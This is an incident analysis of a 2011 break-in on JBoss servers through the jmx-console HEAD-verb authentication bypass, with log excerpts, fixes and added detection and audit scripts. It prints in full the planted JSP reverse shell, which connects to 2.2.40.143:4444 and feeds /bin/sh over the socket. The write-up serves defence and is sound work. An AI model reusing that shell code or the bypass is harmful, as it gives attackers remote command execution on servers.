User:Bourke/intrusion analysis

MPDL

Occurrence
happened on: vm25, vm05, vm06 (nims, qa-coreservice, qa-pubman)

detected via
nagios script jboss-deploy-check

analysis

 * from jboss server.log on vm25

WARNING: The User-Agent "OpenNMS HttpMonitor" is unknown; creating an agent with "unknown" agent attributes.
2011-10-18 11:56:34,015 INFO  [org.jboss.varia.deployment.BeanShellSubDeployer] javax.management.InstanceNotFoundException: jboss.scripts:url=file%3a/tmp/YkkNTSVn.bsh9239.bsh,type=BeanShell is not registered.
2011-10-18 11:56:34,016 ERROR [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost].[/jmx-console].[HtmlAdaptor]] Servlet.service() for servlet HtmlAdaptor threw exception
javax.servlet.ServletException: Original SevletResponse or wrapped original ServletResponse not passed to RequestDispatcher in violation of SRV.8.2 and SRV.14.2.5.1
    at org.apache.catalina.core.ApplicationDispatcher.checkSameObjects(ApplicationDispatcher.java:985)
    at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:316)
    at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292)
    at org.jboss.jmx.adaptor.html.HtmlAdaptorServlet.invokeOpByName(HtmlAdaptorServlet.java:290)
    at org.jboss.jmx.adaptor.html.HtmlAdaptorServlet.processRequest(HtmlAdaptorServlet.java:102)
    at org.jboss.jmx.adaptor.html.HtmlAdaptorServlet.doGet(HtmlAdaptorServlet.java:77)
    at javax.servlet.http.HttpServlet.doHead(HttpServlet.java:271)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:707)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175)
    at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:179)
    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:432)
    at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
    at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262)
    at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844)
    at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
    at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446)
    at java.lang.Thread.run(Thread.java:619)
2011-10-18 11:56:36,247 INFO  [org.jboss.web.tomcat.service.TomcatDeployer] deploy, ctxPath=/zeWvlqOJ,warUrl=.../deploy/zeWvlqOJ.war/
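An added example (not part of the original analysis) of a server.log check in the spirit of jboss-deploy-check: it flags TomcatDeployer deployments of contexts outside an allowlist, and BeanShell scripts deployed from /tmp, which is the entry logged two seconds before the rogue WAR appeared above. The log lines are constructed from the entries quoted above and the expected-context names are assumptions.

```python
import re

# Constructed server.log excerpt modelled on the entries quoted above
# (sample data, not the real log from vm25).
SAMPLE_LOG = """\
2011-10-18 09:12:01,000 INFO  [org.jboss.web.tomcat.service.TomcatDeployer] deploy, ctxPath=/pubman,warUrl=.../deploy/pubman.war/
2011-10-18 11:56:34,015 INFO  [org.jboss.varia.deployment.BeanShellSubDeployer]javax.management.InstanceNotFoundException: jboss.scripts:url=file%3a/tmp/YkkNTSVn.bsh9239.bsh,type=BeanShell is not registered.
2011-10-18 11:56:36,247 INFO  [org.jboss.web.tomcat.service.TomcatDeployer] deploy, ctxPath=/zeWvlqOJ,warUrl=.../deploy/zeWvlqOJ.war/
"""

# Contexts this instance is expected to serve (names are assumptions for the
# example; in practice derive the set from the intended deploy/ contents).
EXPECTED_CONTEXTS = {"/", "/pubman", "/jmx-console", "/web-console"}

DEPLOY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d,\d{3}) INFO\s+"
    r"\[org\.jboss\.web\.tomcat\.service\.TomcatDeployer\] deploy, ctxPath=(?P<ctx>[^,]+),warUrl=")
# A BeanShell script in /tmp being handed to the BSH subdeployer is the second
# indicator visible in the log excerpt above.
BSH_RE = re.compile(r"^(?P<ts>\S+ \S+) .*BeanShellSubDeployer.*url=file%3a(?P<path>/tmp/[^,]+\.bsh)")


def find_suspicious(log_text, expected=EXPECTED_CONTEXTS):
    """Return (kind, timestamp, detail) for every event worth an alert."""
    findings = []
    for line in log_text.splitlines():
        m = DEPLOY_RE.match(line)
        if m:
            if m.group("ctx") not in expected:
                findings.append(("unexpected-deploy", m.group("ts"), m.group("ctx")))
            continue
        m = BSH_RE.match(line)
        if m:
            findings.append(("beanshell-from-tmp", m.group("ts"), m.group("path")))
    return findings
```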

 * from apache access log.

Nothing found. Presumably the intruder came in directly to the jboss via port 8080, where we don't log http access (for reasons of data protection).

intrusion payload
drwxr-xr-x 2 jboss users     4096 Oct 18 11:56 zeWvlqOJ.war

vm25:2 13:18:05 /data/jboss-4.2.2.GA/server/default/deploy/zeWvlqOJ.war # ls
wUTRMmIt.jsp

<%@ page import="java.lang.*, java.util.*, java.io.*, java.net.*" %>
<%!
    // Copies bytes from one stream to the other until either side closes.
    static class StreamConnector extends Thread {
        InputStream is;
        OutputStream os;

        StreamConnector( InputStream is, OutputStream os ) {
            this.is = is;
            this.os = os;
        }

        public void run() {
            BufferedReader in  = null;
            BufferedWriter out = null;
            try {
                in  = new BufferedReader( new InputStreamReader( this.is ) );
                out = new BufferedWriter( new OutputStreamWriter( this.os ) );
                char buffer[] = new char[8192];
                int length;
                while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) {
                    out.write( buffer, 0, length );
                    out.flush();
                }
            } catch( Exception e ){}
            try {
                if( in != null ) in.close();
                if( out != null ) out.close();
            } catch( Exception e ){}
        }
    }
%>
<%
    // On every request: connect out to the remote host and wire the
    // stdin/stdout of /bin/sh to that socket (runs as the jboss user).
    try {
        Socket socket = new Socket( "2.2.40.143", 4444 );
        Process process = Runtime.getRuntime().exec( "/bin/sh" );
        ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
        ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
    } catch( Exception e ) {}
%>

i.e. any request to this JSP opens a socket to 2.2.40.143 on port 4444 and takes commands from it to carry out (as user jboss) on the local system.

vulnerability exposed?
We suspect the security hole used was the known jmx-console vulnerability: its authentication can be bypassed by using the HTTP HEAD verb.

solution
1. turn off autodeploy (except in development environments): as described in the JBoss community documentation, set the scanning attribute of the URLDeploymentScanner bean to false in $JBOSS_HOME/server/default/conf/jboss-service.xml

2. ensure all http verbs trigger authentication by editing WEB-INF/web.xml in deploy/jmx-console and in deploy/management/console-mgr.sar/web-console.war

<security-constraint>
  <web-resource-collection>
    <web-resource-name>HtmlAdaptor</web-resource-name>
    <description>An example security config that only allows users with the
      role JBossAdmin to access the HTML JMX console web application
    </description>
    <url-pattern>/*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
    <role-name>JBossAdmin</role-name>
  </auth-constraint>
</security-constraint>

(tested with the Firefox Poster plugin: with the above configuration every verb tested produced the login screen and a 401 unauthorised. As described in the exploit, without this change use of the HEAD verb bypassed authorisation and led to an authorised session on the jmx-console)
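As an added check (not from the original page or from JBoss), the script below parses a web.xml and reports every security constraint whose web-resource-collection enumerates http-method elements, which is what leaves unlisted verbs such as HEAD outside the auth-constraint; harden() strips those elements so the constraint covers every verb, matching the configuration above. The sample descriptor is constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the jmx-console WEB-INF/web.xml (not the
# file from the affected hosts). Because the collection lists only GET and
# POST, a HEAD request is not subject to the JBossAdmin role check.
SAMPLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>
"""

def _local(tag):
    # Strip the namespace so the check works for any web.xml schema version.
    return tag.rsplit("}", 1)[-1]

def _collections(root):
    return [e for e in root.iter() if _local(e.tag) == "web-resource-collection"]

def audit_constraints(web_xml_text):
    # One record per <web-resource-collection>; a non-empty listed_methods
    # means verbs not in the list (HEAD, PUT, DELETE, ...) bypass the constraint.
    report = []
    for wrc in _collections(ET.fromstring(web_xml_text)):
        name, patterns, methods = "", [], []
        for child in wrc:
            tag, text = _local(child.tag), (child.text or "").strip()
            if tag == "web-resource-name":
                name = text
            elif tag == "url-pattern":
                patterns.append(text)
            elif tag == "http-method":
                methods.append(text.upper())
        report.append({"name": name, "patterns": patterns,
                       "listed_methods": methods, "covers_all_verbs": not methods})
    return report

def harden(web_xml_text):
    # Drop every <http-method> so each constraint applies to all verbs.
    root = ET.fromstring(web_xml_text)
    for wrc in _collections(root):
        for m in [c for c in wrc if _local(c.tag) == "http-method"]:
            wrc.remove(m)
    return ET.tostring(root, encoding="unicode")
```

Run audit_constraints() over both consoles' descriptors after the edit in step 2 and treat any record with covers_all_verbs false as a finding.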